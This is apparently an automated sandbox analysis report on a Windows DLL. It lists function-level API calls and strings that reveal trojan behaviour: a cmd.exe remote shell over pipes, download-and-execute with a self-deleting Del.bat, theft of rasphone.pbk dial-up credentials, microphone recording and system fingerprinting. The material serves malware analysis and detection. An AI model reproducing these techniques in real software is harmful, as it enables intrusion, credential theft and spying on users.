                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$DisconnectNamedPipeTerminate$SleepThread$ObjectProcessSingleWait
                                • String ID:
                                • API String ID: 3528565692-0
                                • Opcode ID: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
                                • Instruction ID: 9c54264b77c618bb7f3ff833bc2f4ed521a7b34ae7468bb6bf74d3fa9e72dd85
                                • Opcode Fuzzy Hash: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
                                • Instruction Fuzzy Hash: 3921DA71600744ABD624EBBACC84F5BF3EDAF98750F014A0DF246D76A0CAB4F8419E60
                                Function 10008110 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 158registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • strrchr.MSVCRT ref: 10008139
                                • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 1000816D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Openstrrchr
                                • String ID: "%1$%s\shell\open\command$D
                                • API String ID: 1564636448-1634606264
                                • Opcode ID: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
                                • Instruction ID: ab82aeec8821551b8da03e6dabbe2dd6c64f2c5119572b537ef325ac62f7637e
                                • Opcode Fuzzy Hash: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
                                • Instruction Fuzzy Hash: 13419572108345ABE714CB60DC80FABB7EDFBC4345F004C1DF69497250D675AA49C762
                                Function 10010FE0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 199pipeprocessCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 1000D1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,1000C45E,?,76F923A0,00000000,100026B5,?,?,00000000,?,?), ref: 1000D1EE
                                • CreatePipe.KERNEL32 ref: 1001108D
                                • CloseHandle.KERNEL32(?), ref: 100110A4
                                • CloseHandle.KERNEL32(?), ref: 100110B1
                                • CreatePipe.KERNEL32(00001F58,00001F54,00001F50,00000000), ref: 100110C4
                                • CloseHandle.KERNEL32(?), ref: 100110DB
                                • CloseHandle.KERNEL32(?), ref: 100110E8
                                • GetStartupInfoA.KERNEL32(0000000C), ref: 10011111
                                • GetSystemDirectoryA.KERNEL32 ref: 10011148
                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?), ref: 10011199
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111AD
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B3
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B9
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoProcessStartupSystem
                                • String ID: D$\cmd.exe
                                • API String ID: 1868129719-520541716
                                • Opcode ID: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
                                • Instruction ID: 21a73dd738c10b035e80e71e0c9392a4d89bcda19f6c107ece9e955ff4ea587f
                                • Opcode Fuzzy Hash: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
                                • Instruction Fuzzy Hash: 0271AF71604745AFE714CF25CC81B9BBBE5EFC8B00F104A2EF655AB290D7B4E8448B96
                                Function 10006AD0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 169filesleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                • sprintf.MSVCRT ref: 10006B8F
                                • sprintf.MSVCRT ref: 10006BD7
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10006BEF
                                • Sleep.KERNEL32(00000064,00000000,?,?,00000000,00000000), ref: 10006BF6
                                • RtlExitUserThread.NTDLL(00000000), ref: 10006C08
                                • Sleep.KERNEL32(000493E0), ref: 10006C38
                                • CreateFileA.KERNEL32(C:\Del.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 10006C72
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006C92
                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10006C99
                                • WinExec.KERNEL32(C:\Del.bat,00000000), ref: 10006CA6
                                • RtlExitUserThread.NTDLL(00000000), ref: 10006CBF
                                  • Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
                                  • Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
                                  • Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
                                  • Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                  • Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
                                  • Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$File$ExitMessageSleepUsersprintf$CloseCountCreateCurrentDownloadExecHandleInputPostStateTickWriterand
                                • String ID: %s?abc=%d%d%d%d$C:\Del.bat$C:\WINDOWS\TEMP\%d%d%d%d.ccc$Del c:\windows\temp\**.cccDel %0
                                • API String ID: 1802622305-1970547419
                                • Opcode ID: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
                                • Instruction ID: a99f9cc9cae1f12021b554281c88dee9c3d8dd1fd31d28a6ceb09f359c56c71a
                                • Opcode Fuzzy Hash: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
                                • Instruction Fuzzy Hash: EC4105B26403413EF210DBA4DC42FB7779AEB85744F110438F78AAA2C1DAB579498667
                                Function 10006F40 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 89stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowsDirectoryA.KERNEL32 ref: 10006F5E
                                • strchr.MSVCRT ref: 10006F70
                                • lstrcpy.KERNEL32(00000001), ref: 10006F7B
                                • lstrcat.KERNEL32(?,?), ref: 10006F90
                                • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10006F9C
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006FAC
                                • wsprintfA.USER32 ref: 10006FCC
                                • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10006FEA
                                • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,00000400), ref: 10007015
                                • lstrlen.KERNEL32(00000000), ref: 1000702D
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000704B
                                Strings
                                • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006FB9
                                • %s//%s, xrefs: 10006FC6
                                • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006F96
                                • Documents and Settings\, xrefs: 10006F64
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$??2@??3@DirectoryFolderNamesPathPrivateProfileSectionSpecialWindowslstrcpylstrlenstrchrwsprintf
                                • String ID: %s//%s$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                                • API String ID: 1834765725-145037316
                                • Opcode ID: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
                                • Instruction ID: 9755ad88c6a7c2de1a7a09f9197344cb42d28d28b3bab84a9660466105d068a3
                                • Opcode Fuzzy Hash: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
                                • Instruction Fuzzy Hash: 3C31A1B1504395AFE710DF60DC88F9BB7E9FB89705F04091CF68597240E679EA09CBA2
                                Function 100077C0 Relevance: 22.9, APIs: 15, Instructions: 369COMMON
                                Download Yara Rule
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(0000001C,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007840
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007883
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007897
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078DD
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078F1
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007937
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 1000794B
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007991
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079A5
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079EB
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079FF
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 10007A58
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007A6C
                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 10007AB1
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007AC5
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$??3@
                                • String ID:
                                • API String ID: 1245774677-0
                                • Opcode ID: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                                • Instruction ID: ecb620a65a387641466dd8f5cfd537940ff52a14495c8058afc9bdc292101b4f
                                • Opcode Fuzzy Hash: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                                • Instruction Fuzzy Hash: BCC1BCBAB042054BE718CE39C89296B77D6FB882A0B15862CFD1A873C1DF75ED05C791
                                Function 100092E0 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 93stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                • lstrlen.KERNEL32(?), ref: 10009365
                                • lstrcat.KERNEL32(?,rar.exe), ref: 100093A1
                                • lstrcpy.KERNEL32(?,?), ref: 100093B2
                                • PathRemoveFileSpecA.SHLWAPI(?), ref: 100093BC
                                • lstrcpy.KERNEL32(?,?), ref: 100093C8
                                • PathRemoveExtensionA.SHLWAPI(?), ref: 100093CF
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 100093DF
                                • wsprintfA.USER32 ref: 100093F4
                                • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 10009418
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: PathRemovelstrcatlstrcpy$ExecuteExtensionFileOpenShellSpeclstrlenwsprintf
                                • String ID: WinRAR\shell\open\command$open$rar.exe$x %s %s
                                • API String ID: 1763624715-2921234164
                                • Opcode ID: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
                                • Instruction ID: a81b6a790fa88baee27cdb696a84ad45282978667647cc58660b41da7713e94e
                                • Opcode Fuzzy Hash: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
                                • Instruction Fuzzy Hash: 6D3195B6104399AFE730DB64CC94FEB77AEEBC8304F00891CF68597141DA756A05CB62
                                Function 1000C130 Relevance: 22.8, APIs: 15, Instructions: 287stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strchrstrncpy$atoi
                                • String ID:
                                • API String ID: 3940265933-0
                                • Opcode ID: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
                                • Instruction ID: 21ca36c069230d07eea7d776a96db384ee496568b4fed2c6a8f6547b2fdee8a7
                                • Opcode Fuzzy Hash: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
                                • Instruction Fuzzy Hash: 6591F8329002595BD728CB75CC45AEFB7A5FF88360F10436AF91AA32D0DEB49F45CA94
                                Function 10002D20 Relevance: 22.6, APIs: 15, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • waveInStop.WINMM(?,?,?,?,?,10002D08), ref: 10002D37
                                • waveInReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D41
                                • waveInUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D5E
                                • waveInClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D6A
                                • TerminateThread.KERNEL32(?,000000FF,?,00000020,?,?,?,?,10002D08), ref: 10002D76
                                • waveOutReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D87
                                • waveOutUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DA4
                                • waveOutClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DB0
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,10002D08), ref: 10002DC2
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,10002D08), ref: 10002DCA
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,10002D08), ref: 10002DD3
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,10002D08), ref: 10002DDC
                                • CloseHandle.KERNEL32(?), ref: 10002DF4
                                • CloseHandle.KERNEL32(?), ref: 10002DFA
                                • CloseHandle.KERNEL32(?), ref: 10002E00
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Close$??3@$Handle$HeaderResetUnprepare$StopTerminateThread
                                • String ID:
                                • API String ID: 3312516386-0
                                • Opcode ID: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
                                • Instruction ID: f53181e0cb89491cd7c99ff78531d68b368b4d0a2bb5ae7883e750d4989dc1ff
                                • Opcode Fuzzy Hash: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
                                • Instruction Fuzzy Hash: 82214DB62107519FE620DB71CC88967B3BEFF8C350B014A09E69247755EB75FC458B60
                                Function 10002820 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84windowregistryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000), ref: 10002827
                                • LoadIconA.USER32 ref: 1000285E
                                • LoadCursorA.USER32(00000000,00007F00), ref: 1000286F
                                • RegisterClassExA.USER32(?), ref: 1000288E
                                • CreateWindowExA.USER32(00000000,1007A204,1007A204,00CF0000,000000DF,000000DF,000000DF,000000DF,00000000,00000000,00000000,00000000), ref: 100028B4
                                • ShowWindow.USER32(00000000,00000005), ref: 100028C3
                                • UpdateWindow.USER32(00000000), ref: 100028CA
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100028E1
                                • TranslateMessage.USER32(00007F05), ref: 100028F9
                                • DispatchMessageA.USER32(00007F05), ref: 10002900
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000290D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Window$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
                                • String ID: 0
                                • API String ID: 2442869364-4108050209
                                • Opcode ID: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
                                • Instruction ID: 49f6c6a48927359fcf1092dd417bf73ba722ddb4962998ae2525dee049488c6b
                                • Opcode Fuzzy Hash: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
                                • Instruction Fuzzy Hash: C121B5715483607FF310DB688C49F4B7BA4EB85B60F104A19F744AB3C4EBB59A00CB96
                                Function 1000A950 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$Version
                                • String ID: Windows 2000$Windows 2003$Windows NT$Windows Windows7/Vista/2008$Windows XP
                                • API String ID: 514958720-574678973
                                • Opcode ID: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
                                • Instruction ID: 24eada89e271c6f03dafd311d52a79426f13bcc6e3bcc886577ca1c3c34736ac
                                • Opcode Fuzzy Hash: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
                                • Instruction Fuzzy Hash: D5118230900796ABF610CB58DCA4B8A77D0EB43295FD1C519F6C992310D738A994CB5B
                                Function 1000FE80 Relevance: 19.6, APIs: 13, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                • ReleaseDC.USER32(?,?), ref: 1000FEB8
                                • DeleteDC.GDI32(?), ref: 1000FEC8
                                • DeleteDC.GDI32(?), ref: 1000FECE
                                • DeleteDC.GDI32(?), ref: 1000FED4
                                • DeleteDC.GDI32(?), ref: 1000FEDD
                                • DeleteObject.GDI32(?), ref: 1000FEE9
                                • DeleteObject.GDI32(?), ref: 1000FEEF
                                • DeleteObject.GDI32(?), ref: 1000FEF8
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF02
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF0E
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF17
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF20
                                • DestroyCursor.USER32(00000000), ref: 1000FF46
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$??3@$Object$CursorDestroyRelease
                                • String ID:
                                • API String ID: 2735177900-0
                                • Opcode ID: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
                                • Instruction ID: e788815f10d6092d27ca2afd98025b986ca8f6d31416693049e9cb6994815525
                                • Opcode Fuzzy Hash: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
                                • Instruction Fuzzy Hash: C121FAB6500B509BE324DB69CC80A67F3EDFF89610F154E1DF69683750DAB9F8448B60
                                Function 100068B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 134sleepprocessthreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10006830: GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
                                  • Part of subcall function 10006830: sprintf.MSVCRT ref: 1000688E
                                • RtlExitUserThread.NTDLL(00000000), ref: 10006A49
                                  • Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
